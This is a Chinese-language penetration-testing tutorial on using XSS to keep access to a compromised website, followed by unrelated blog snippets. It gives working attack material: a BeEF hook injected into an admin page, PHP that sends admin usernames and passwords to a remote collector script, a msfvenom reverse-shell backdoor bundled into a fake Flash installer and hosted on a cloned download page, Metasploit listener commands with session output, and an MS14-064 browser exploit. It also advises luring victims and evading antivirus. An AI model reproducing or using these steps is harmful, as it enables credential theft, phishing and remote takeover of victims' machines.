day37WEB攻防-通用漏洞XSS跨站权限维持钓鱼捆绑浏览器漏洞

目录

XSS-后台植入 Cookie&表单劫持(权限维持)

案例演示

XSS-Flash 钓鱼配合 MSF 捆绑上线

1、生成后门

2、下载官方文件-保证安装正常

3、压缩捆绑文件-解压提取运行

4、MSF 配置监听状态

5、诱使受害者访问 URL-语言要适当

XSS-浏览器网马配合 MSF 访问上线

1、配置 MSF 生成 URL

2、诱使受害者访问 URL-语言要适当


本章知识点:
1 XSS 跨站 - 另类攻击手法分类
2 XSS 跨站 - 权限维持 & 钓鱼 & 浏览器等
配套资源(百度网盘)
链接:https://pan.baidu.com/s/1ylKH1_BZI1OB2fNKP7scug?pwd=z00z 
提取码:z00z

XSS-后台植入 Cookie&表单劫持(权限维持)

- 条件:已取得相关 web 权限后
1 、写入代码到登录成功文件,利用 beef xss 平台实时监控 Cookie 等凭据实现权限
维持
2 、若存在同源策略或防护情况下, Cookie 获取失败可采用表单劫持或数据明文传输实

什么是权限维持,就是虽然我们获取到了网站权限,但是并不能保证一直拥有权限,因为可能某一天对方的杀毒软件将我们植入的后门代码给删除了,那么就不能保证权限的持续,所以要获取管理员后台的登入账号密码,虽然可以通过获取Cookie值进行登入,但是如果在有防护的情况下获取到的Cookie值可能是错误的,这样就无法登入后台。当然我们在拥有权限的基础上,可以直接进入通过数据库查看账号密码,但是如果密码加密了呢,而且还是无法解密呢,虽然数据库里面也能获取到一些数据,但是不够直观,但是后台的数据是直观的,所以这里要解决的就是在获取了权限的情况下无法登入后台的情况。

表单劫持能够解决Cookie获取失败和获取到了后台用户密码但是无法解密的情况

案例演示

搭建环境,对应的源码配套资料里面有

在管理员登入成功界面植入xss代码,然后模拟管理员登入,通过beef或者xss平台获取Cookie值,这里使用的是beef

<script src="http://192.168.68.130:3000/hook.js"></script>

 /admin/index.php

登入beef查看在线主机获取Cookie值 

这里有点尴尬,这个Cookie值是正确的,可以通过抓包改包成功登入后台 

ok现在我们尝试用表单劫持获取后台的登入账号密码,基本思路:要先知道登入界面的数据会传到哪个文件进行后台处理,我们追踪到那个文件通过js代码将数据获取然后传到我们的远程主机上面,这样我们就可以成功获取到后台的账号密码。

在登入界面通过抓包查看数据的走向

然后在目录下找到对应文件打开,阅读代码功能

我们在下面写入对应代码获取数据

$up='<script src=http://IP/hyw/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'></script>';
echo $up;

登入远程服务器,在服务器对应目录新建get.php文件,在get.php文件里写入接收数据的对应代码 

<?php
$u = $_GET['user'];
$p = $_GET['pass'];
$myfile = fopen("newfile.txt", "w+");
fwrite($myfile, $u);
fwrite($myfile, '|');
fwrite($myfile, $p);
fclose($myfile);
?>
模拟登入然后查看get.php同目录下的newfile.txt文件

XSS-Flash 钓鱼配合 MSF 捆绑上线

- 条件: beef 上线受控后或直接钓鱼(受害者爱看 SESE

1、生成后门

打开kail Linux,输入下面命令,xxx代表IP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe

2、下载官方文件-保证安装正常

官方网址:https://www.flash.cn/
下载到桌面

3、压缩捆绑文件-解压提取运行

选中下载的官方软件以及后门软件

修改名称,选择创建自解压格式 

 

 

 更改图标(对应的软件在配套资源里面有)

这样我们就将官方软件和我们的后门软件捆绑在一起了 

接着就是将我们捆绑好的软件放到自己搭建的网站上去

然后搭建一个和flash官方网站差不多的页面用来迷惑攻击者(源吗在配套资源里面)

然后将刚刚上传到自己网站的后门软件链接替换下载链接

 ok,现在只要将我们将仿制的官方界面对应的链接发给受害者,对方点击了下载按钮就会下载捆绑软件,而捆绑里面有我们的后门软件,当然现在去尝试点击下载可能会被电脑拦截,除非我们做了免杀。 

4MSF 配置监听状态

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
┌──(root㉿aozhan)-[~]
└─# msfconsoleMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMMhttps://metasploit.com=[ metasploit v6.3.27-dev                          ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]Metasploit tip: Enable verbose logging with set VERBOSE 
true                                                                                                                  
Metasploit Documentation: https://docs.metasploit.com/msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 0.0.0.0:6666 
[*] Sending stage (175686 bytes) to 192.168.68.1
[*] Meterpreter session 1 opened (192.168.68.130:6666 -> 192.168.68.1:12455) at 2024-02-01 15:57:29 +0800

 对方上线之后直接获取对方主机操作权限。这里就不往下走了,感兴趣的朋友可以自己体会。

5、诱使受害者访问 URL-语言要适当

两种方式让受害者访问下载链接
1,通过诱惑让受害者访问
2,通过beef构造xss,使页面跳转
3,将免杀做好很关键

XSS-浏览器网马配合 MSF 访问上线

- 条件: beef 上线受控后或直接钓鱼(浏览器存在 0day
MS14-064简介: Microsoft Windows OLE远程代码执行漏洞, OLE (对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影Win95+IE3 - Win10+IE11全版本。

1、配置 MSF 生成 URL

msfconsole
use exploit/windows/browser/ms14_064_ole_code_execution
set allowpowershellprompt true
set target 1
run

2、诱使受害者访问 URL-语言要适当

漏洞复现:https://www.cnblogs.com/panglinglong/p/17393402.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/250048.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Matlab处理excel数据

我们新建个excel文档&#xff0c;用Matlab读取里面的内容&#xff0c;计算和判断里面的计算结果是否正确&#xff0c;并打印到另一个文档当中。 新建文档 新建输入文档&#xff0c;文件名TestExcel 编写脚本 [num,txt] xlsread(TestExcel.xlsx); SNcode num(:,1);%从序号中…

回归预测 | Matlab实现CPO-LSSVM冠豪猪算法优化最小二乘支持向量机多变量回归预测

回归预测 | Matlab实现CPO-LSSVM冠豪猪算法优化最小二乘支持向量机多变量回归预测 目录 回归预测 | Matlab实现CPO-LSSVM冠豪猪算法优化最小二乘支持向量机多变量回归预测预测效果基本介绍程序设计参考资料 预测效果 基本介绍 Matlab实现CPO-LSSVM冠豪猪算法优化最小二乘支持向…

洛谷P8599 [蓝桥杯 2013 省 B] 带分数

[蓝桥杯 2013 省 B] 带分数 题目描述 100 100 100 可以表示为带分数的形式&#xff1a; 100 3 69258 714 100 3 \frac{69258}{714} 100371469258​。 还可以表示为&#xff1a; 100 82 3546 197 100 82 \frac{3546}{197} 100821973546​。 注意特征&#xff1a;带分…

Prompt Learning 的几个重点paper

Prefix Tuning: Prefix-Tuning: Optimizing Continuous Prompts for Generation 在输入token之前构造一段任务相关的virtual tokens作为Prefix&#xff0c;然后训练的时候只更新Prefix部分的参数&#xff0c;PLM中的其他参数固定。针对自回归架构模型&#xff1a;在句子前面添…

Django模型(八)

一、修改数据 先获取对象,通过对象属性更新数据,再保存 (更新单一数据)通过QuerySet的update函数更新数据 (更新多条数据) #单条记录修改 save c = Cook.objects.get(pk=1) c.name = 安妮 c.save()# 更新多个值 update Cook.objects.filter(sect=粤菜).update(level=5)1.1、…

SD-WAN如何解决企业网络面临的问题?

企业网络在不断增长和发展的同时&#xff0c;所面临的问题也越来越多。SD-WAN作为一项崭新的网络技术&#xff0c;正迅速成为企业的首选。究竟SD-WAN在解决企业网络问题上有何独特之处呢&#xff1f; 优化网络性能与带宽利用率 传统广域网常常面临多地点数据传输时的高延迟、低…

【深蓝学院】移动机器人运动规划--第3章 基于采样的路径规划--作业

0. Assignment T1. MATLAB实现RRT 1.1 GPT-4任务分析 RRT伪代码&#xff1a; 任务1即使用matlab实现RRT&#xff0c;结合作业所给框架&#xff0c;简单梳理&#xff0c;可结合1.2代码理解&#xff1a; 设置start&#xff0c;goal&#xff0c;near to goal threshold Thr&am…

MySql主从同步,同步SQL_ERROR 1032解决办法

1.登录从库 mysql -u root -p 2.输入命令查看状态 SHOW SLAVE STATUS\G; 3.找到对应的错误数据位置 Slave_IO_Running: YesSlave_SQL_Running: NoReplicate_Do_DB: app_push_centerReplicate_Ignore_DB: Replicate_Do_Table: Replicate_Ignore_Table: Replicate_Wild_Do_Tabl…

github连不上

github连不上 错误提示解决方案steam 采用Hosts加速 错误提示 fatal: unable to access ‘https://github.com/Ada-design/qianduan.git/’: Failed to connect to github.com port 443 after 21073 ms: Couldn’t connect to server 解决方案 下载steam https://steampp.ne…

Flutter的安装与环境配置

一、下载安装Futter&#xff1a; 1、Flutter中文文档&#xff1a; 安装和环境配置 - Flutter 中文文档 - Flutter 中文开发者网站 - Flutter 2、下载 Futter SDK&#xff1a; Flutter中文文档 里面有&#xff0c;下载完成之后找个文件夹解压出来&#xff0c;最好不要将 Flu…

专业数据治理:数据中台系统塑造企业未来的数字化运营管理新秩序

随着信息化进程的快速推进&#xff0c;数据已然成为企业最为宝贵的资产。对于众多企业而言&#xff0c;如何有效整合、治理以及充分利用这些数据&#xff0c;使之成为推动业务发展的引擎&#xff0c;成为当前难题。数据中台应运而生&#xff0c;它被认为是企业数字化转型的至关…

深度解读NVMe计算存储协议-3

在NVMe计算存储架构中&#xff0c;Copy命令用于在不同类型的命名空间之间进行数据复制&#xff1a; Memory Copy命令&#xff1a;定义于SLM&#xff08;Subsystem Local Memory&#xff09;命令集&#xff0c;主要用于从非易失性存储命名空间&#xff08;NVM namespaces&#x…

“IT行业的黄金证书:你必须了解的顶级认证“

文章目录 每日一句正能量前言一、网络方向&#xff1a;思科认证/软考二、华为认证三、系统方向&#xff1a;红帽认证四、数据库方向&#xff1a;Oracle认证五、信息安全方向&#xff1a;CISP/CISSP认证六、管理方向&#xff1a;PMP认证IT行业证书的价值和作用后记 每日一句正能…

XML传参方式

export function groupLoginAPI(xmlData) {return http.post(/tis/group/1.0/login, xmlData, {headers: {Content-Type: application/xml,X-Requested-With: AAServer/4.0,}}) }import {groupLoginAPI} from "../api/user"; function (e) { //xml格式传参let groupX…

前端JavaScript篇之let、const、var的区别

目录 let、const、var的区别 let、const、var的区别 let、const和var是JavaScript中用于声明变量的关键字&#xff0c;它们之间有一些区别。 首先&#xff0c;var是在ES5中引入的关键字&#xff0c;而let和const是在ES6中引入的。在ES6之前&#xff0c;我们只能使用var来声明…

双非本科准备秋招(13.1)—— 力扣 栈、队列与堆

1、103. 二叉树的锯齿形层序遍历 昨天做的二叉树的层序遍历&#xff0c;把代码直接拿过来。 这个题要求的是一个Z型遍历&#xff0c;如下图。 用一个变量f记录正反顺序&#xff0c;然后使用LinkedList记录答案&#xff0c;下图可以看到LinkedList继承了Deque&#xff0c;所以…

【开源】JAVA+Vue.js实现电子元器件管理系统

目录 一、摘要1.1 项目简介1.2 项目录屏 二、研究内容三、界面展示3.1 登录&注册&主页3.2 元器件单位模块3.3 元器件仓库模块3.4 元器件供应商模块3.5 元器件品类模块3.6 元器件明细模块3.7 元器件类型模块3.8 元器件采购模块3.9 元器件领用模块3.10 系统基础模块 四、…

C++学习Day01之namespace命名空间

目录 一、程序及输出1.1 命名空间用途&#xff1a; 解决名称冲突1.2 命名空间内容1.3 命名空间必须要声明在全局作用域下1.4 命名空间可以嵌套命名空间1.5 命名空间开放&#xff0c;可以随时给命名空间添加新的成员1.6 命名空间可以是匿名的1.7 命名空间可以起别名 二、分析与总…

02.PostgreSQL运算符

1. 算术运算符 算术运算符 描述 示例 + 加法运算符 SELECT A+B - 减法运算符 SELECT A-B * 乘法运算符 SELECT A*B / 除法运算符 SELECT A/B % 取余运算符 SELECT A%B 1.1 加法与减法操作符 SELECT 100,100+11,100-11,100+23.0,100-23.0 运算结果 由此得出结论: 一个整数加上…

微服务-微服务Alibaba-Nacos 源码分析 (源码流程图)

客户端流程 客户端心跳与实例往服务端注册